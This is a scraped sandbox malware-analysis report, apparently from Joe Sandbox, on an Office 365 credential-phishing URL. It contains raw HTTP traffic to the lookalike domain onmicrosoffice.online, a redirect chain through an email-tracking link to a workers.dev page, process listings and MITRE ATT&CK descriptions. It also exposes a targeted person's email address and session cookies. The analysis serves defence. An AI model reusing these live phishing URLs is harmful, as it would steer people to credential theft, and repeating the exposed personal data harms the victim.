Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://onmicrosoffice.online/?i4pz914tl=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1iYXJiYXJhLnJlbnRsZXIlNDByb3MuY29tJmNsaWVudC1yZXF1ZXN0LWlkPWMwYmIxZDVmLWY4MTItZTJkMi1iYWU0LWVjNzY1Nzg5N2M2MyZwcm90ZWN0ZWR0b2tlbj10cnVlJmNsYWltcz0lN2IlMjJpZF90b2tlbiUyMiUzYSU3YiUyMnhtc19jYyUyMiUzYSU3YiUyMnZhbHVlcyUyMiUzYSU1YiUyMkNQMSUyMiU1ZCU3ZCU3ZCU3ZCZub25jZT02Mzg0OTU2MTg4Mjk1NzE5NTQuNzRjOGVhMDgtNWI4Zi00YWM1LWIxZTctYzIxMjIwNjAzN2JmJnN0YXRlPURZdEJDc01nRUFDMWVVc3ZCWTBhMTEwUHBVOHBxNWcya0NqWVFMOGZZV1p1STRVUTBfQTJsR1pFWUZqSVJ3aVd5RVZBRzhGcjlKa0tHMUtRYUZXZU02aGtDNnJzckhNbW1BWFRLc2Y3bU51ZjU5ZmVQbHQ5ZjdkNlBoUDNBZXRlNnJtWGZ2ZW10NV9PN2JnQQ== Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=W0H4QtKQv7br; qPdM.sig=U-Oy8SNmt-6MqabUMMHPOKH0nXY; ClientId=A794BA8C4B654B43ACDC7267ACAB95AC; OIDC=1; OpenIdConnect.nonce.v3.PKuzfwUTEvLItbobcOVAyzWnTNk46nlUCuz9anBslxY=638495618829571954.74c8ea08-5b8f-4ac5-b1e7-c212206037bf; X-OWA-RedirectHistory=ArLym14Bctf65mFk3Ag; esctx-yMbl01kPIpQ=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd851iqwTKcGtxOB7U7qoaXs9uh7LORIq6gTHyjKudzTC1CM19nIJXPrKFdQ4fkePJqr3gTVODApOxjtqnZftvgfLn5hLz4nBuNcv_3fTypvkZ8dFI4BL6wEcN2n5GYLOdG_8OuJ-90s0wVyqGG5Kbh8CAA; esctx=PAQABBwEAAADnfolhJpSnRYB1SVj-Hgd8nV2pomA_lu1HEyz2Yh2a2abAjmlN7beaCAcudLYUmBxiRPThwuqOShgJIWDsK4j9vaRXLOWMCw7UBceW2sQUClzV4gKP4eqzQ76hLVD213_uewjjAfJC4QFwms6pWnb33QpGKgdnTPaVwqiCEVHhbQY3t8AFgQwAHQK8DWN78LcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.ATQAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAADnfolhJpSnRYB1SVj-Hgd8f3NgQXzFlz1F6CzUuYF5Sc1rezYsCGaYyrX-h3pL4vH2Pp9k0FbY24QyB-NCCmuFuKYLFQAGxZTYt_Muyjr5cNa72QeAGxdanAh_eAOl1j0gAA; ESTSWCTXFLOWTOKEN=AQABIQEAAADnfolhJpSnRYB1SVj-Hgd8lixCNCRl70QyaQ3nnEUUU_DViKkPkMjksUhWhRiSudCjgBWyIPqa0bRvys5mpUWZOZCQJ4RAnVH71HESASTSrmw8gIohbikGCpPanGAF0WGqWR2cFW2Rtp0FRDzenzWPZX3J-0fyDRQzemwDNLfUv_I86ZW5oWwPtm00HW_9fyiALr46L2BdSqZ5iBftr4o9FDBJlSOf6Rxq7JTyC5-tmLSN1JiJN_s0u7zTkap-KmYI2RQQFxtf46AjVTqR84HPPEYMtMp0JzqTQuK2cRJl5qkWXFaWcjKSrWf8EQEF7ocutHYPrZgq7rLJtnA57JPFYjpmSlL55GIHBPeDbgcaYes9hmjKyUgncx1_TeybEWFU1CkjX5B40VPfWUsPabR2O8liURUWOp2IvcxbvH_4E_9qecq5HSq6fn2z1e1a1ID-3aJuuBh8eJ9-u-HIQplSoWoijUU59iyWR-s6-X454CAA; fpc=AvaH28Aio81MiaUB3bZI-ZyerOTJAQAAAB3_ut0OAAAA; cltm=CgAQABoAIgQIDBAF
2024-04-24 13:24:47 UTC	2141	IN	HTTP/1.1 302 Found Date: Wed, 24 Apr 2024 13:24:47 GMT Content-Length: 0 Connection: close Server: nginx x-okta-request-id: c48bc65da3f7d21c85105832f079ad1f p3p: CP="HONK" set-cookie: sid="";Version=1;Path=/;Max-Age=0 set-cookie: autolaunch_triggered=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline'; location: https://onmicrosoffice.online/login/login.htm?fromURI=%2Fapp%2Foffice365%2Fexkbyzh836PzvDSda0x7%2Fsso%2Fwsfed%2Fpassive%3Flogin_hint%3Dbarbara.rentler%2540ros.com%26client-request-id%3Dc0bb1d5f-f812-e2d2-bae4-ec7657897c63%26username%3Dbarbara.rentler%2540ros.com%26wa%3Dwsignin1.0%26wtrealm%3Durn%253afederation%253aMicrosoftOnline%26wctx%3Destsredirect%253d2%2526estsrequest%253drQQIARAAjVE_aBNhHL0vl55prBq6tAiiHE7VS-673H8QvMQkjTE2tdb0KhIul-9L0tzlS-8uqVq7OSg4FDcdOjhmEidJlo7SKQgunUREioiKU0cTXNz08ePxhh-Px3sLNIxD_SL_BwI3YY7HGHI2mqi_4M1GY5Vzw_3Z4_efBp-_9cpPH9l9cL4RBB1fTyRIN3AIacUJxk0bxW3iJsiWlXgLwAiAIwCeh-aqljc-K-6hduAg76pH_MlfP6TISVXUJBmqqqBJCtQkMa6ItoosXuWkqoo50bIlrgqRwtkCFARe5pNKFR-GziwZ3aAhTIh4zYfoV2gaE8-tdIgfvKR3wTUzSKX9Yj1jpCFa9Xspk7cg5EudVbWzKdWFVnrDXL6hYrO83s2Lq8t8xRCc3HrGzG7kb201yw8yd4ycmvW0661CDhaWrWwZFeVGKy17vrdYdF1j7XbBx4p7s4slDaOSE2hYqcmlRilpoADJnruGe8gNpMqSUq0bffq_un5DM-NiXNI-oBnSQe1mbRQGH8Pga3iGp_VIJBqj5qkL1HEYvJoaz_JDO6tvaXPF4fyHYeRyEhxMJYyG2ZOsTD4tkna-oGyqZTfTWukVLxWz43CFhFB3NpAnpjI584qsw10G7DLMgJmO0DGKpdMleMSAnwx4coIaTP9r49FJcDgjRhnbsZquP7uwzTZrlYC0UJvVt9n7rl-x7YnqWU4X-ax-lx37s_d2dnb2T1HHp7_sPX639-zF98XXMeo30 content-language: en Strict-Transport-Security: max-age=315360000; includeSubDomains

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49780	89.116.187.236	443	5744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:48 UTC	4344	OUT	GET /login/login.htm?fromURI=%2Fapp%2Foffice365%2Fexkbyzh836PzvDSda0x7%2Fsso%2Fwsfed%2Fpassive%3Flogin_hint%3Dbarbara.rentler%2540ros.com%26client-request-id%3Dc0bb1d5f-f812-e2d2-bae4-ec7657897c63%26username%3Dbarbara.rentler%2540ros.com%26wa%3Dwsignin1.0%26wtrealm%3Durn%253afederation%253aMicrosoftOnline%26wctx%3Destsredirect%253d2%2526estsrequest%253drQQIARAAjVE_aBNhHL0vl55prBq6tAiiHE7VS-673H8QvMQkjTE2tdb0KhIul-9L0tzlS-8uqVq7OSg4FDcdOjhmEidJlo7SKQgunUREioiKU0cTXNz08ePxhh-Px3sLNIxD_SL_BwI3YY7HGHI2mqi_4M1GY5Vzw_3Z4_efBp-_9cpPH9l9cL4RBB1fTyRIN3AIacUJxk0bxW3iJsiWlXgLwAiAIwCeh-aqljc-K-6hduAg76pH_MlfP6TISVXUJBmqqqBJCtQkMa6ItoosXuWkqoo50bIlrgqRwtkCFARe5pNKFR-GziwZ3aAhTIh4zYfoV2gaE8-tdIgfvKR3wTUzSKX9Yj1jpCFa9Xspk7cg5EudVbWzKdWFVnrDXL6hYrO83s2Lq8t8xRCc3HrGzG7kb201yw8yd4ycmvW0661CDhaWrWwZFeVGKy17vrdYdF1j7XbBx4p7s4slDaOSE2hYqcmlRilpoADJnruGe8gNpMqSUq0bffq_un5DM-NiXNI-oBnSQe1mbRQGH8Pga3iGp_VIJBqj5qkL1HEYvJoaz_JDO6tvaXPF4fyHYeRyEhxMJYyG2ZOsTD4tkna-oGyqZTfTWukVLxWz43CFhFB3NpAnpjI584qsw10G7DLMgJmO0DGKpdMleMSAnwx4coIaTP9r49FJcDgjRhnbsZquP7uwzTZrlYC0UJvVt9n7rl-x7YnqWU4X-ax-lx37s_d2dnb2T1HHp7_sPX639-zF98XXMeo30 HTTP/1.1 Host: onmicrosoffice.online Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://onmicrosoffice.online/?i4pz914tl=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1iYXJiYXJhLnJlbnRsZXIlNDByb3MuY29tJmNsaWVudC1yZXF1ZXN0LWlkPWMwYmIxZDVmLWY4MTItZTJkMi1iYWU0LWVjNzY1Nzg5N2M2MyZwcm90ZWN0ZWR0b2tlbj10cnVlJmNsYWltcz0lN2IlMjJpZF90b2tlbiUyMiUzYSU3YiUyMnhtc19jYyUyMiUzYSU3YiUyMnZhbHVlcyUyMiUzYSU1YiUyMkNQMSUyMiU1ZCU3ZCU3ZCU3ZCZub25jZT02Mzg0OTU2MTg4Mjk1NzE5NTQuNzRjOGVhMDgtNWI4Zi00YWM1LWIxZTctYzIxMjIwNjAzN2JmJnN0YXRlPURZdEJDc01nRUFDMWVVc3ZCWTBhMTEwUHBVOHBxNWcya0NqWVFMOGZZV1p1STRVUTBfQTJsR1pFWUZqSVJ3aVd5RVZBRzhGcjlKa0tHMUtRYUZXZU02aGtDNnJzckhNbW1BWFRLc2Y3bU51ZjU5ZmVQbHQ5ZjdkNlBoUDNBZXRlNnJtWGZ2ZW10NV9PN2JnQQ== Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=W0H4QtKQv7br; qPdM.sig=U-Oy8SNmt-6MqabUMMHPOKH0nXY; ClientId=A794BA8C4B654B43ACDC7267ACAB95AC; OIDC=1; OpenIdConnect.nonce.v3.PKuzfwUTEvLItbobcOVAyzWnTNk46nlUCuz9anBslxY=638495618829571954.74c8ea08-5b8f-4ac5-b1e7-c212206037bf; X-OWA-RedirectHistory=ArLym14Bctf65mFk3Ag; esctx-yMbl01kPIpQ=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd851iqwTKcGtxOB7U7qoaXs9uh7LORIq6gTHyjKudzTC1CM19nIJXPrKFdQ4fkePJqr3gTVODApOxjtqnZftvgfLn5hLz4nBuNcv_3fTypvkZ8dFI4BL6wEcN2n5GYLOdG_8OuJ-90s0wVyqGG5Kbh8CAA; esctx=PAQABBwEAAADnfolhJpSnRYB1SVj-Hgd8nV2pomA_lu1HEyz2Yh2a2abAjmlN7beaCAcudLYUmBxiRPThwuqOShgJIWDsK4j9vaRXLOWMCw7UBceW2sQUClzV4gKP4eqzQ76hLVD213_uewjjAfJC4QFwms6pWnb33QpGKgdnTPaVwqiCEVHhbQY3t8AFgQwAHQK8DWN78LcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.ATQAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAADnfolhJpSnRYB1SVj-Hgd8f3NgQXzFlz1F6CzUuYF5Sc1rezYsCGaYyrX-h3pL4vH2Pp9k0FbY24QyB-NCCmuFuKYLFQAGxZTYt_Muyjr5cNa72QeAGxdanAh_eAOl1j0gAA; ESTSWCTXFLOWTOKEN=AQABIQEAAADnfolhJpSnRYB1SVj-Hgd8lixCNCRl70QyaQ3nnEUUU_DViKkPkMjksUhWhRiSudCjgBWyIPqa0bRvys5mpUWZOZCQJ4RAnVH71HESASTSrmw8gIohbikGCpPanGAF0WGqWR2cFW2Rtp0FRDzenzWPZX3J-0fyDRQzemwDNLfUv_I86ZW5oWwPtm00HW_9fyiALr46L2BdSqZ5iBftr4o9FDBJlSOf6Rxq7JTyC5-tmLSN1JiJN_s0u7zTkap-KmYI2RQQFxtf46AjVTqR84HPPEYMtMp0JzqTQuK2cRJl5qkWXFaWcjKSrWf8EQEF7ocutHYPrZgq7rLJtnA57JPFYjpmSlL55GIHBPeDbgcaYes9hmjKyUgncx1_TeybEWFU1CkjX5B40VPfWUsPabR2O8liURUWOp2IvcxbvH_4E_9qecq5HSq6fn2z1e1a1ID-3aJuuBh8eJ9-u-HIQplSoWoijUU59iyWR-s6-X454CAA; fpc=AvaH28Aio81MiaUB3bZI-ZyerOTJAQAAAB3_ut0OAAAA; cltm=CgAQABoAIgQIDBAF
2024-04-24 13:24:48 UTC	1173	IN	HTTP/1.1 404 Not Found Cache-Control: private Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly Strict-Transport-Security: max-age=31536000; includeSubDomains P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" x-ms-request-id: 4d9ca318-3e0a-4275-afec-4ed068470b01 x-ms-ests-server: 2.1.17846.6 - NCUS ProdSlices nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0} x-ms-srs: 1.P Referrer-Policy: strict-origin-when-cross-origin Date: Wed, 24 Apr 2024 13:24:47 GMT Connection: close Content-Length: 0 Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';

Target ID:	0
Start time:	15:23:59
Start date:	24/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	15:24:03
Start date:	24/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2968 --field-trial-handle=2924,i,12212526387744986071,14092912345193000886,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	15:24:06
Start date:	24/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://insidesales-email.com/l/1/17013047/Y/eus.p01-2019.10.02-460581/1/ab/4K6W-nzk0hr_GKydLIdUc0LK4HrUUeoMK4jMzee40WM?lnk=https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/?qrc=barbara.rentler@ros.com"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://insidesales-email.com/l/1/17013047/Y/eus.p01-2019.10.02-460581/1/ab/4K6W-nzk0hr_GKydLIdUc0LK4HrUUeoMK4jMzee40WM?lnk=https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/?qrc=barbara.rentler@ros.com

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 48

Chrome Cache Entry: 49

Chrome Cache Entry: 50

Chrome Cache Entry: 51

Chrome Cache Entry: 52

Chrome Cache Entry: 53

Chrome Cache Entry: 54

Chrome Cache Entry: 55

Chrome Cache Entry: 56

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 5580, Parent PID: 5672

General

Chronological Activities

Windows Analysis Report
https://insidesales-email.com/l/1/17013047/Y/eus.p01-2019.10.02-460581/1/ab/4K6W-nzk0hr_GKydLIdUc0LK4HrUUeoMK4jMzee40WM?lnk=https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/?qrc=barbara.rentler@ros.com